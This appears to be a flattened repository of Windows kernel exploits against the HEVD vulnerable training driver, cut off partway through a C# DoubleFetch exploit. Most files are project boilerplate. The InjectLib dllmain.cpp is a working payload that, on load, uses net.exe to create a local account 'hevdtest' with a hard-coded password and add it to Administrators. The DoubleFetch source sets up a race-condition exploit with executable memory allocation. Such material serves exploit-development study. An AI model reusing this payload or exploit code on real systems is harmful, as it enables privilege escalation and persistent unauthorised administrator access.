├── HEVD_Win10x64
├── ArbitraryIncrement
│ ├── App.config
│ ├── ArbitraryIncrement.csproj
│ ├── Program.cs
│ └── Properties
│ │ └── AssemblyInfo.cs
├── ArbitraryReadWrite
│ ├── App.config
│ ├── ArbitraryReadWrite.csproj
│ ├── Program.cs
│ └── Properties
│ │ └── AssemblyInfo.cs
├── ArbitraryWrite
│ ├── App.config
│ ├── ArbitraryWrite.csproj
│ ├── Program.cs
│ └── Properties
│ │ └── AssemblyInfo.cs
├── HEVD_Win10x64.sln
├── InjectLib
│ ├── InjectLib.vcxproj
│ ├── InjectLib.vcxproj.filters
│ ├── InjectLib.vcxproj.user
│ ├── dllmain.cpp
│ ├── framework.h
│ ├── pch.cpp
│ └── pch.h
└── InsecureKernelResourceAccess
│ ├── App.config
│ ├── InsecureKernelResourceAccess.csproj
│ ├── Program.cs
│ └── Properties
│ └── AssemblyInfo.cs
├── HEVD_Win7x86
├── DoubleFetch
│ ├── App.config
│ ├── DoubleFetch.csproj
│ ├── DoubleFetch.csproj.user
│ ├── Program.cs
│ └── Properties
│ │ └── AssemblyInfo.cs
├── HEVD_Win7x86.sln
├── InjectLib
│ ├── InjectLib.vcxproj
│ ├── InjectLib.vcxproj.filters
│ ├── InjectLib.vcxproj.user
│ ├── dllmain.cpp
│ ├── framework.h
│ ├── pch.cpp
│ └── pch.h
├── InsecureKernelResourceAccess
│ ├── InsecureKernelResourceAccess.csproj
│ ├── Program.cs
│ └── Properties
│ │ └── AssemblyInfo.cs
├── IntegerOverflow
│ ├── App.config
│ ├── IntegerOverflow.csproj
│ ├── Program.cs
│ └── Properties
│ │ └── AssemblyInfo.cs
├── NullPointerDereference
│ ├── App.config
│ ├── NullPointerDereference.csproj
│ ├── Program.cs
│ └── Properties
│ │ └── AssemblyInfo.cs
├── PoolOverflow
│ ├── App.config
│ ├── PoolOverflow.csproj
│ ├── Program.cs
│ └── Properties
│ │ └── AssemblyInfo.cs
├── StackOverflow
│ ├── App.config
│ ├── Program.cs
│ ├── Properties
│ │ └── AssemblyInfo.cs
│ └── StackOverflow.csproj
├── StackOverflowGS
│ ├── App.config
│ ├── Program.cs
│ ├── Properties
│ │ └── AssemblyInfo.cs
│ └── StackOverflowGS.csproj
├── TypeConfusion
│ ├── App.config
│ ├── Program.cs
│ ├── Properties
│ │ └── AssemblyInfo.cs
│ └── TypeConfusion.csproj
├── UninitializedHeapVariable
│ ├── Program.cs
│ ├── Properties
│ │ └── AssemblyInfo.cs
│ └── UninitializedHeapVariable.csproj
├── UninitializedStackVariable
│ ├── App.config
│ ├── Program.cs
│ ├── Properties
│ │ └── AssemblyInfo.cs
│ └── UninitializedStackVariable.csproj
├── UseAfterFree
│ ├── App.config
│ ├── Program.cs
│ ├── Properties
│ │ └── AssemblyInfo.cs
│ └── UseAfterFree.csproj
├── WriteNull
│ ├── App.config
│ ├── Program.cs
│ ├── Properties
│ │ └── AssemblyInfo.cs
│ └── WriteNull.csproj
├── WriteWhatWhere
│ ├── App.config
│ ├── Program.cs
│ ├── Properties
│ │ └── AssemblyInfo.cs
│ └── WriteWhatWhere.csproj
└── WriteWhatWhereGDI
│ ├── App.config
│ ├── Program.cs
│ ├── Properties
│ └── AssemblyInfo.cs
│ └── WriteWhatWhereGDI.csproj
└── README.md
/HEVD_Win10x64/ArbitraryIncrement/App.config:
--------------------------------------------------------------------------------
--------------------------------------------------------------------------------
/HEVD_Win10x64/ArbitraryIncrement/ArbitraryIncrement.csproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | Debug
6 | AnyCPU
7 | {3D31131A-2ECF-4A7B-A076-6F3F22C66B4F}
8 | Exe
9 | ArbitraryIncrement
10 | ArbitraryIncrement
11 | v4.5
12 | 512
13 | true
14 |
15 |
16 | true
17 | ..\bin\x64\Debug\
18 | DEBUG;TRACE
19 | full
20 | x64
21 | 7.3
22 | prompt
23 | true
24 |
25 |
26 | ..\bin\x64\Release\
27 | TRACE
28 | true
29 | pdbonly
30 | x64
31 | 7.3
32 | prompt
33 | true
34 |
35 |
36 |
37 |
38 |
39 |
40 |
41 |
42 |
43 |
44 |
45 |
46 |
47 |
48 |
49 |
50 |
51 |
52 |
53 |
--------------------------------------------------------------------------------
/HEVD_Win10x64/ArbitraryIncrement/Properties/AssemblyInfo.cs:
--------------------------------------------------------------------------------
1 | using System.Reflection;
2 | using System.Runtime.CompilerServices;
3 | using System.Runtime.InteropServices;
4 |
5 | // General Information about an assembly is controlled through the following
6 | // set of attributes. Change these attribute values to modify the information
7 | // associated with an assembly.
8 | [assembly: AssemblyTitle("ArbitraryIncrement")]
9 | [assembly: AssemblyDescription("")]
10 | [assembly: AssemblyConfiguration("")]
11 | [assembly: AssemblyCompany("")]
12 | [assembly: AssemblyProduct("ArbitraryIncrement")]
13 | [assembly: AssemblyCopyright("Copyright © 2021")]
14 | [assembly: AssemblyTrademark("")]
15 | [assembly: AssemblyCulture("")]
16 |
17 | // Setting ComVisible to false makes the types in this assembly not visible
18 | // to COM components. If you need to access a type in this assembly from
19 | // COM, set the ComVisible attribute to true on that type.
20 | [assembly: ComVisible(false)]
21 |
22 | // The following GUID is for the ID of the typelib if this project is exposed to COM
23 | [assembly: Guid("3d31131a-2ecf-4a7b-a076-6f3f22c66b4f")]
24 |
25 | // Version information for an assembly consists of the following four values:
26 | //
27 | // Major Version
28 | // Minor Version
29 | // Build Number
30 | // Revision
31 | //
32 | // You can specify all the values or you can default the Build and Revision Numbers
33 | // by using the '*' as shown below:
34 | // [assembly: AssemblyVersion("1.0.*")]
35 | [assembly: AssemblyVersion("1.0.0.0")]
36 | [assembly: AssemblyFileVersion("1.0.0.0")]
37 |
--------------------------------------------------------------------------------
/HEVD_Win10x64/ArbitraryReadWrite/App.config:
--------------------------------------------------------------------------------
--------------------------------------------------------------------------------
/HEVD_Win10x64/ArbitraryReadWrite/ArbitraryReadWrite.csproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | Debug
6 | AnyCPU
7 | {05C2FCB6-4797-4B79-AD16-F116986F171B}
8 | Exe
9 | ArbitraryReadWrite
10 | ArbitraryReadWrite
11 | v4.5
12 | 512
13 | true
14 |
15 |
16 | true
17 | ..\bin\x64\Debug\
18 | DEBUG;TRACE
19 | full
20 | x64
21 | 7.3
22 | prompt
23 | true
24 |
25 |
26 | ..\bin\x64\Release\
27 | TRACE
28 | true
29 | pdbonly
30 | x64
31 | 7.3
32 | prompt
33 | true
34 |
35 |
36 |
37 |
38 |
39 |
40 |
41 |
42 |
43 |
44 |
45 |
46 |
47 |
48 |
49 |
50 |
51 |
52 |
53 |
--------------------------------------------------------------------------------
/HEVD_Win10x64/ArbitraryReadWrite/Properties/AssemblyInfo.cs:
--------------------------------------------------------------------------------
1 | using System.Reflection;
2 | using System.Runtime.CompilerServices;
3 | using System.Runtime.InteropServices;
4 |
5 | // General Information about an assembly is controlled through the following
6 | // set of attributes. Change these attribute values to modify the information
7 | // associated with an assembly.
8 | [assembly: AssemblyTitle("ArbitraryReadWrite")]
9 | [assembly: AssemblyDescription("")]
10 | [assembly: AssemblyConfiguration("")]
11 | [assembly: AssemblyCompany("")]
12 | [assembly: AssemblyProduct("ArbitraryReadWrite")]
13 | [assembly: AssemblyCopyright("Copyright © 2021")]
14 | [assembly: AssemblyTrademark("")]
15 | [assembly: AssemblyCulture("")]
16 |
17 | // Setting ComVisible to false makes the types in this assembly not visible
18 | // to COM components. If you need to access a type in this assembly from
19 | // COM, set the ComVisible attribute to true on that type.
20 | [assembly: ComVisible(false)]
21 |
22 | // The following GUID is for the ID of the typelib if this project is exposed to COM
23 | [assembly: Guid("05c2fcb6-4797-4b79-ad16-f116986f171b")]
24 |
25 | // Version information for an assembly consists of the following four values:
26 | //
27 | // Major Version
28 | // Minor Version
29 | // Build Number
30 | // Revision
31 | //
32 | // You can specify all the values or you can default the Build and Revision Numbers
33 | // by using the '*' as shown below:
34 | // [assembly: AssemblyVersion("1.0.*")]
35 | [assembly: AssemblyVersion("1.0.0.0")]
36 | [assembly: AssemblyFileVersion("1.0.0.0")]
37 |
--------------------------------------------------------------------------------
/HEVD_Win10x64/ArbitraryWrite/App.config:
--------------------------------------------------------------------------------
--------------------------------------------------------------------------------
/HEVD_Win10x64/ArbitraryWrite/ArbitraryWrite.csproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | Debug
6 | AnyCPU
7 | {FADC67ED-BEE2-4875-9BD0-101C9B084A1C}
8 | Exe
9 | ArbitraryWrite
10 | ArbitraryWrite
11 | v4.5
12 | 512
13 | true
14 |
15 |
16 | true
17 | ..\bin\x64\Debug\
18 | DEBUG;TRACE
19 | full
20 | x64
21 | 7.3
22 | prompt
23 | true
24 |
25 |
26 | ..\bin\x64\Release\
27 | TRACE
28 | true
29 | pdbonly
30 | x64
31 | 7.3
32 | prompt
33 | true
34 |
35 |
36 |
37 |
38 |
39 |
40 |
41 |
42 |
43 |
44 |
45 |
46 |
47 |
48 |
49 |
50 |
51 |
52 |
53 |
--------------------------------------------------------------------------------
/HEVD_Win10x64/ArbitraryWrite/Properties/AssemblyInfo.cs:
--------------------------------------------------------------------------------
1 | using System.Reflection;
2 | using System.Runtime.CompilerServices;
3 | using System.Runtime.InteropServices;
4 |
5 | // General Information about an assembly is controlled through the following
6 | // set of attributes. Change these attribute values to modify the information
7 | // associated with an assembly.
8 | [assembly: AssemblyTitle("ArbitraryWrite")]
9 | [assembly: AssemblyDescription("")]
10 | [assembly: AssemblyConfiguration("")]
11 | [assembly: AssemblyCompany("")]
12 | [assembly: AssemblyProduct("ArbitraryWrite")]
13 | [assembly: AssemblyCopyright("Copyright © 2021")]
14 | [assembly: AssemblyTrademark("")]
15 | [assembly: AssemblyCulture("")]
16 |
17 | // Setting ComVisible to false makes the types in this assembly not visible
18 | // to COM components. If you need to access a type in this assembly from
19 | // COM, set the ComVisible attribute to true on that type.
20 | [assembly: ComVisible(false)]
21 |
22 | // The following GUID is for the ID of the typelib if this project is exposed to COM
23 | [assembly: Guid("fadc67ed-bee2-4875-9bd0-101c9b084a1c")]
24 |
25 | // Version information for an assembly consists of the following four values:
26 | //
27 | // Major Version
28 | // Minor Version
29 | // Build Number
30 | // Revision
31 | //
32 | // You can specify all the values or you can default the Build and Revision Numbers
33 | // by using the '*' as shown below:
34 | // [assembly: AssemblyVersion("1.0.*")]
35 | [assembly: AssemblyVersion("1.0.0.0")]
36 | [assembly: AssemblyFileVersion("1.0.0.0")]
37 |
--------------------------------------------------------------------------------
/HEVD_Win10x64/HEVD_Win10x64.sln:
--------------------------------------------------------------------------------
1 |
2 | Microsoft Visual Studio Solution File, Format Version 12.00
3 | # Visual Studio Version 16
4 | VisualStudioVersion = 16.0.31729.503
5 | MinimumVisualStudioVersion = 10.0.40219.1
6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "InjectLib", "InjectLib\InjectLib.vcxproj", "{CCC9A18A-F932-4A09-B618-6701C16874D2}"
7 | EndProject
8 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "InsecureKernelResourceAccess", "InsecureKernelResourceAccess\InsecureKernelResourceAccess.csproj", "{C0B187E5-0BBD-4BC4-B48C-72CB412B05A7}"
9 | EndProject
10 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "ArbitraryReadWrite", "ArbitraryReadWrite\ArbitraryReadWrite.csproj", "{05C2FCB6-4797-4B79-AD16-F116986F171B}"
11 | EndProject
12 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "ArbitraryWrite", "ArbitraryWrite\ArbitraryWrite.csproj", "{FADC67ED-BEE2-4875-9BD0-101C9B084A1C}"
13 | EndProject
14 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "ArbitraryIncrement", "ArbitraryIncrement\ArbitraryIncrement.csproj", "{3D31131A-2ECF-4A7B-A076-6F3F22C66B4F}"
15 | EndProject
16 | Global
17 | GlobalSection(SolutionConfigurationPlatforms) = preSolution
18 | Debug|x64 = Debug|x64
19 | Release|x64 = Release|x64
20 | EndGlobalSection
21 | GlobalSection(ProjectConfigurationPlatforms) = postSolution
22 | {CCC9A18A-F932-4A09-B618-6701C16874D2}.Debug|x64.ActiveCfg = Debug|x64
23 | {CCC9A18A-F932-4A09-B618-6701C16874D2}.Debug|x64.Build.0 = Debug|x64
24 | {CCC9A18A-F932-4A09-B618-6701C16874D2}.Release|x64.ActiveCfg = Release|x64
25 | {CCC9A18A-F932-4A09-B618-6701C16874D2}.Release|x64.Build.0 = Release|x64
26 | {C0B187E5-0BBD-4BC4-B48C-72CB412B05A7}.Debug|x64.ActiveCfg = Debug|x64
27 | {C0B187E5-0BBD-4BC4-B48C-72CB412B05A7}.Debug|x64.Build.0 = Debug|x64
28 | {C0B187E5-0BBD-4BC4-B48C-72CB412B05A7}.Release|x64.ActiveCfg = Release|x64
29 | {C0B187E5-0BBD-4BC4-B48C-72CB412B05A7}.Release|x64.Build.0 = Release|x64
30 | {05C2FCB6-4797-4B79-AD16-F116986F171B}.Debug|x64.ActiveCfg = Debug|x64
31 | {05C2FCB6-4797-4B79-AD16-F116986F171B}.Debug|x64.Build.0 = Debug|x64
32 | {05C2FCB6-4797-4B79-AD16-F116986F171B}.Release|x64.ActiveCfg = Release|x64
33 | {05C2FCB6-4797-4B79-AD16-F116986F171B}.Release|x64.Build.0 = Release|x64
34 | {FADC67ED-BEE2-4875-9BD0-101C9B084A1C}.Debug|x64.ActiveCfg = Debug|x64
35 | {FADC67ED-BEE2-4875-9BD0-101C9B084A1C}.Debug|x64.Build.0 = Debug|x64
36 | {FADC67ED-BEE2-4875-9BD0-101C9B084A1C}.Release|x64.ActiveCfg = Release|x64
37 | {FADC67ED-BEE2-4875-9BD0-101C9B084A1C}.Release|x64.Build.0 = Release|x64
38 | {3D31131A-2ECF-4A7B-A076-6F3F22C66B4F}.Debug|x64.ActiveCfg = Debug|x64
39 | {3D31131A-2ECF-4A7B-A076-6F3F22C66B4F}.Debug|x64.Build.0 = Debug|x64
40 | {3D31131A-2ECF-4A7B-A076-6F3F22C66B4F}.Release|x64.ActiveCfg = Release|x64
41 | {3D31131A-2ECF-4A7B-A076-6F3F22C66B4F}.Release|x64.Build.0 = Release|x64
42 | EndGlobalSection
43 | GlobalSection(SolutionProperties) = preSolution
44 | HideSolutionNode = FALSE
45 | EndGlobalSection
46 | GlobalSection(ExtensibilityGlobals) = postSolution
47 | SolutionGuid = {969CE67D-56DE-4CC4-B652-0776D31111C5}
48 | EndGlobalSection
49 | EndGlobal
50 |
--------------------------------------------------------------------------------
/HEVD_Win10x64/InjectLib/InjectLib.vcxproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | Debug
6 | Win32
7 |
8 |
9 | Release
10 | Win32
11 |
12 |
13 | Debug
14 | x64
15 |
16 |
17 | Release
18 | x64
19 |
20 |
21 |
22 | 16.0
23 | Win32Proj
24 | {ccc9a18a-f932-4a09-b618-6701c16874d2}
25 | InjectLib
26 | 10.0
27 |
28 |
29 |
30 | DynamicLibrary
31 | true
32 | v142
33 | Unicode
34 |
35 |
36 | DynamicLibrary
37 | false
38 | v142
39 | true
40 | Unicode
41 |
42 |
43 | DynamicLibrary
44 | true
45 | v142
46 | Unicode
47 |
48 |
49 | DynamicLibrary
50 | false
51 | v142
52 | true
53 | Unicode
54 |
55 |
56 |
57 |
58 |
59 |
60 |
61 |
62 |
63 |
64 |
65 |
66 |
67 |
68 |
69 |
70 |
71 |
72 |
73 |
74 | true
75 |
76 |
77 | false
78 |
79 |
80 | true
81 | $(SolutionDir)bin\$(Platform)\$(Configuration)\
82 |
83 |
84 | false
85 | $(SolutionDir)bin\$(Platform)\$(Configuration)\
86 |
87 |
88 |
89 | Level3
90 | true
91 | WIN32;_DEBUG;INJECTLIB_EXPORTS;_WINDOWS;_USRDLL;%(PreprocessorDefinitions)
92 | true
93 | Use
94 | pch.h
95 |
96 |
97 | Windows
98 | true
99 | false
100 |
101 |
102 |
103 |
104 | Level3
105 | true
106 | true
107 | true
108 | WIN32;NDEBUG;INJECTLIB_EXPORTS;_WINDOWS;_USRDLL;%(PreprocessorDefinitions)
109 | true
110 | Use
111 | pch.h
112 |
113 |
114 | Windows
115 | true
116 | true
117 | true
118 | false
119 |
120 |
121 |
122 |
123 | Level3
124 | true
125 | _DEBUG;INJECTLIB_EXPORTS;_WINDOWS;_USRDLL;%(PreprocessorDefinitions)
126 | true
127 | Use
128 | pch.h
129 |
130 |
131 | Windows
132 | true
133 | false
134 |
135 |
136 |
137 |
138 | Level3
139 | true
140 | true
141 | true
142 | NDEBUG;INJECTLIB_EXPORTS;_WINDOWS;_USRDLL;%(PreprocessorDefinitions)
143 | true
144 | Use
145 | pch.h
146 |
147 |
148 | Windows
149 | true
150 | true
151 | true
152 | false
153 |
154 |
155 |
156 |
157 |
158 |
159 |
160 |
161 |
162 | Create
163 | Create
164 | Create
165 | Create
166 |
167 |
168 |
169 |
170 |
171 |
--------------------------------------------------------------------------------
/HEVD_Win10x64/InjectLib/InjectLib.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 | Header Files
20 |
21 |
22 | Header Files
23 |
24 |
25 |
26 |
27 | Source Files
28 |
29 |
30 | Source Files
31 |
32 |
33 |
--------------------------------------------------------------------------------
/HEVD_Win10x64/InjectLib/InjectLib.vcxproj.user:
--------------------------------------------------------------------------------
--------------------------------------------------------------------------------
/HEVD_Win10x64/InjectLib/dllmain.cpp:
--------------------------------------------------------------------------------
1 | #include "pch.h"
2 |
extern "C" {
    // Runs the given command line as a new console process rooted in System32, waits for
    // it to exit and returns whether CreateProcess succeeded. `cmd` must be a writable
    // buffer: the project builds with Unicode, so this resolves to CreateProcessW, which
    // may modify the command-line string in place.
    __declspec(dllexport) BOOL ExecuteCommand(wchar_t cmd[])
    {
        wchar_t workingDir[] = L"C:\\Windows\\System32";
        STARTUPINFO startup{};          // value-initialised: all fields zero
        PROCESS_INFORMATION proc{};
        startup.cb = sizeof(startup);

        const BOOL started = ::CreateProcess(
            NULL,
            cmd,
            NULL,
            NULL,
            FALSE,
            CREATE_NEW_CONSOLE,
            NULL,
            workingDir,
            &startup,
            &proc);

        if (!started)
        {
            return started;
        }

        // Block until the child exits (INFINITE is the same bit pattern as the -1 used
        // elsewhere), then release both handles.
        ::WaitForSingleObject(proc.hProcess, INFINITE);
        ::CloseHandle(proc.hProcess);
        ::CloseHandle(proc.hThread);
        return started;
    }
}
36 |
// DLL entry point. On DLL_PROCESS_ATTACH it synchronously runs two net.exe commands
// that create a local user with a hard-coded password and add it to the local
// Administrators group; it always returns TRUE so the load proceeds. The DLL is
// presumably loaded into a privileged process by the exploits in this solution
// (the InjectLib name suggests so; the loader is outside this file).
//
// NOTE(review): CreateProcess plus a blocking WaitForSingleObject from DllMain runs
// under the loader lock, which the DllMain documentation warns can deadlock; here it
// also means the host's DLL load stalls until both net.exe runs finish. From a
// detection standpoint the observable artefacts are net.exe spawned by an unexpected
// parent, a new local account and a change to Administrators membership, all with a
// fixed account name and password.
BOOL APIENTRY DllMain(HMODULE hModule,
    DWORD dwReason,
    LPVOID lpReserved
) {
    if (dwReason == DLL_PROCESS_ATTACH)
    {
        wchar_t adduser[] = L"C:\\Windows\\System32\\net.exe user hevdtest Password123! /add";
        wchar_t addgroup[] = L"C:\\Windows\\System32\\net.exe localgroup Administrators hevdtest /add";
        ExecuteCommand(adduser);   // blocks until net.exe exits (ExecuteCommand waits with -1 == INFINITE)
        ExecuteCommand(addgroup);  // return values are not checked; failures are silent
    }
    return TRUE;
}
50 |
--------------------------------------------------------------------------------
/HEVD_Win10x64/InjectLib/framework.h:
--------------------------------------------------------------------------------
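#pragma once

#define WIN32_LEAN_AND_MEAN // Exclude rarely-used stuff from Windows headers
// Windows Header Files
// The include target was lost when the page was rendered (angle brackets stripped);
// the standard Visual Studio DLL template includes windows.h here, which is what
// dllmain.cpp's STARTUPINFO / CreateProcess usage requires.
#include <windows.h>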
--------------------------------------------------------------------------------
/HEVD_Win10x64/InjectLib/pch.cpp:
--------------------------------------------------------------------------------
1 | // pch.cpp: source file corresponding to the pre-compiled header
2 |
3 | #include "pch.h"
4 |
5 | // When you are using pre-compiled headers, this source file is necessary for compilation to succeed.
6 |
--------------------------------------------------------------------------------
/HEVD_Win10x64/InjectLib/pch.h:
--------------------------------------------------------------------------------
1 | // pch.h: This is a precompiled header file.
2 | // Files listed below are compiled only once, improving build performance for future builds.
3 | // This also affects IntelliSense performance, including code completion and many code browsing features.
4 | // However, files listed here are ALL re-compiled if any one of them is updated between builds.
5 | // Do not add files here that you will be updating frequently as this negates the performance advantage.
6 |
7 | #ifndef PCH_H
8 | #define PCH_H
9 |
10 | // add headers that you want to pre-compile here
11 | #include "framework.h"
12 |
13 | #endif //PCH_H
14 |
--------------------------------------------------------------------------------
/HEVD_Win10x64/InsecureKernelResourceAccess/App.config:
--------------------------------------------------------------------------------
--------------------------------------------------------------------------------
/HEVD_Win10x64/InsecureKernelResourceAccess/InsecureKernelResourceAccess.csproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | Debug
6 | AnyCPU
7 | {C0B187E5-0BBD-4BC4-B48C-72CB412B05A7}
8 | Exe
9 | InsecureKernelResourceAccess
10 | InsecureKernelResourceAccess
11 | v4.5
12 | 512
13 | true
14 |
15 |
16 | true
17 | ..\bin\x64\Debug\
18 | DEBUG;TRACE
19 | full
20 | x64
21 | 7.3
22 | prompt
23 | true
24 |
25 |
26 | ..\bin\x64\Release\
27 | TRACE
28 | true
29 | pdbonly
30 | x64
31 | 7.3
32 | prompt
33 | true
34 |
35 |
36 |
37 |
38 |
39 |
40 |
41 |
42 |
43 |
44 |
45 |
46 |
47 |
48 |
49 |
50 |
51 |
52 |
53 |
--------------------------------------------------------------------------------
/HEVD_Win10x64/InsecureKernelResourceAccess/Properties/AssemblyInfo.cs:
--------------------------------------------------------------------------------
1 | using System.Reflection;
2 | using System.Runtime.CompilerServices;
3 | using System.Runtime.InteropServices;
4 |
5 | // General Information about an assembly is controlled through the following
6 | // set of attributes. Change these attribute values to modify the information
7 | // associated with an assembly.
8 | [assembly: AssemblyTitle("InsecureKernelResourceAccess")]
9 | [assembly: AssemblyDescription("")]
10 | [assembly: AssemblyConfiguration("")]
11 | [assembly: AssemblyCompany("")]
12 | [assembly: AssemblyProduct("InsecureKernelResourceAccess")]
13 | [assembly: AssemblyCopyright("Copyright © 2021")]
14 | [assembly: AssemblyTrademark("")]
15 | [assembly: AssemblyCulture("")]
16 |
17 | // Setting ComVisible to false makes the types in this assembly not visible
18 | // to COM components. If you need to access a type in this assembly from
19 | // COM, set the ComVisible attribute to true on that type.
20 | [assembly: ComVisible(false)]
21 |
22 | // The following GUID is for the ID of the typelib if this project is exposed to COM
23 | [assembly: Guid("c0b187e5-0bbd-4bc4-b48c-72cb412b05a7")]
24 |
25 | // Version information for an assembly consists of the following four values:
26 | //
27 | // Major Version
28 | // Minor Version
29 | // Build Number
30 | // Revision
31 | //
32 | // You can specify all the values or you can default the Build and Revision Numbers
33 | // by using the '*' as shown below:
34 | // [assembly: AssemblyVersion("1.0.*")]
35 | [assembly: AssemblyVersion("1.0.0.0")]
36 | [assembly: AssemblyFileVersion("1.0.0.0")]
37 |
--------------------------------------------------------------------------------
/HEVD_Win7x86/DoubleFetch/App.config:
--------------------------------------------------------------------------------
--------------------------------------------------------------------------------
/HEVD_Win7x86/DoubleFetch/DoubleFetch.csproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | Debug
6 | AnyCPU
7 | {C3FDED0A-DD87-4D37-99F5-1E679BD831AD}
8 | Exe
9 | DoubleFetch
10 | DoubleFetch
11 | v2.0
12 | 512
13 | true
14 |
15 | publish\
16 | true
17 | Disk
18 | false
19 | Foreground
20 | 7
21 | Days
22 | false
23 | false
24 | true
25 | 0
26 | 1.0.0.%2a
27 | false
28 | false
29 | true
30 |
31 |
32 | true
33 | ..\bin\x86\Debug\
34 | DEBUG;TRACE
35 | full
36 | x86
37 | prompt
38 | MinimumRecommendedRules.ruleset
39 | true
40 |
41 |
42 | ..\bin\x86\Release\
43 | TRACE
44 | true
45 | pdbonly
46 | x86
47 | prompt
48 | MinimumRecommendedRules.ruleset
49 | true
50 |
51 |
52 | DoubleFetch.Program
53 |
54 |
55 |
56 |
57 |
58 |
59 |
60 |
61 |
62 |
63 |
64 |
65 |
66 |
67 |
68 | False
69 | .NET Framework 3.5 SP1
70 | true
71 |
72 |
73 |
74 |
--------------------------------------------------------------------------------
/HEVD_Win7x86/DoubleFetch/DoubleFetch.csproj.user:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 | publish\
5 |
6 |
7 |
8 |
9 |
10 | en-US
11 | false
12 |
13 |
--------------------------------------------------------------------------------
/HEVD_Win7x86/DoubleFetch/Program.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Runtime.InteropServices;
3 | using System.Text;
4 | using System.Threading;
5 |
6 | namespace DoubleFetch
7 | {
8 | class Program
9 | {
// Input structure for the driver's double-fetch IOCTL (0x222037, issued in ThreadOverflow):
// a user-mode buffer pointer and its length. Sequential layout keeps the field order the
// driver expects. Because DeviceIoControl receives this struct by `ref` and it is blittable,
// the kernel reads the static field itself — which is what lets ThreadSizeChange change Size
// while the call is in flight (the TOCTOU the driver is presumably vulnerable to; confirm
// against the driver source).
[StructLayout(LayoutKind.Sequential)]
struct DOUBLE_FETCH
{
    public IntPtr Buffer; // pointer to the user-mode payload (PayloadBuffer)
    public int Size;      // length the driver is told to copy; flipped concurrently by ThreadSizeChange
}
16 |
// Managed mirror of the Win32 SECURITY_ATTRIBUTES structure passed to CreateProcess
// (see SpawnShell). Only nLength is populated there; the descriptor stays null and
// bInheritHandle stays 0 (no inheritance). bInheritHandle is declared as int rather
// than bool to keep the native 4-byte BOOL width.
[StructLayout(LayoutKind.Sequential)]
struct SECURITY_ATTRIBUTES
{
    public int nLength;               // size of this structure, set via Marshal.SizeOf
    public IntPtr lpSecurityDescriptor; // never set here (IntPtr.Zero == default descriptor)
    public int bInheritHandle;        // native BOOL; 0 in this program
}
24 |
// Managed mirror of the Win32 STARTUPINFO structure (Unicode variant, so the string
// fields marshal as LPWSTR). SpawnShell passes a default-constructed instance.
// NOTE(review): the native API expects cb to hold the structure size; SpawnShell never
// sets it, so it is passed as 0. wShowWindow/cbReserved2 are WORD natively; short has
// the same width.
[StructLayout(LayoutKind.Sequential, CharSet=CharSet.Unicode)]
struct STARTUPINFO
{
    public int cb;            // structure size, expected by CreateProcess; left at 0 in SpawnShell
    public string lpReserved;
    public string lpDesktop;
    public string lpTitle;
    public int dwX;
    public int dwY;
    public int dwXSize;
    public int dwYSize;
    public int dwXCountChars;
    public int dwYCountChars;
    public int dwFillAttribute;
    public int dwFlags;       // none of the STARTF_* flags are set in this program
    public short wShowWindow;
    public short cbReserved2;
    public IntPtr lpReserved2;
    public IntPtr hStdInput;
    public IntPtr hStdOutput;
    public IntPtr hStdError;
}
47 |
// Managed mirror of the Win32 PROCESS_INFORMATION structure, filled by CreateProcess
// (declared with `out`). hProcess and hThread are kernel handles the caller owns and
// must close; SpawnShell closes both after its wait.
[StructLayout(LayoutKind.Sequential)]
struct PROCESS_INFORMATION
{
    public IntPtr hProcess;  // handle to the new process; closed by SpawnShell
    public IntPtr hThread;   // handle to its primary thread; closed by SpawnShell
    public int dwProcessId;  // printed by SpawnShell on success
    public int dwThreadId;
}
56 |
// RtlGetNtVersionNumbers (ntdll, not part of the documented Win32 API): reports the
// kernel's major/minor/build numbers. IsWin7x86 masks BuildNumber with 0xFFFF because
// the upper bits are not part of the build number.
[DllImport("ntdll.dll")]
static extern void RtlGetNtVersionNumbers(
    ref int MajorVersion,
    ref int MinorVersion,
    ref int BuildNumber);

// VirtualAlloc: used in Main to obtain pages for the shellcode and the payload
// (with PAGE_EXECUTE_READWRITE). Returns IntPtr.Zero on failure; SetLastError=true
// makes Marshal.GetLastWin32Error() meaningful afterwards.
[DllImport("kernel32.dll", SetLastError=true)]
static extern IntPtr VirtualAlloc(
    IntPtr lpAddress,
    uint dwSize,
    uint flAllocationType,
    uint flProtect);

// CreateFile: presumably used to open the driver's device object (the call is in the
// part of Main not shown here). Security attributes and template handle are raw pointers.
[DllImport("kernel32.dll", CharSet=CharSet.Auto, SetLastError=true)]
static extern IntPtr CreateFile(
    string lpFileName,
    uint dwDesiredAccess,
    uint dwShareMode,
    IntPtr lpSecurityAttributes,
    uint dwCreationDisposition,
    uint dwFlagsAndAttributes,
    IntPtr hTemplateFile);

// DeviceIoControl, specialised so the input buffer is the DOUBLE_FETCH struct by `ref`.
// DOUBLE_FETCH is blittable (IntPtr + int), so the marshaller passes the address of the
// static field itself rather than a copy — which is why writes from ThreadSizeChange
// are visible to the driver during the call.
[DllImport("kernel32.dll", SetLastError=true)]
static extern bool DeviceIoControl(
    IntPtr hDevice,
    uint dwIoControlCode,
    ref DOUBLE_FETCH InBuffer,
    int nInBufferSize,
    IntPtr OutBuffer,
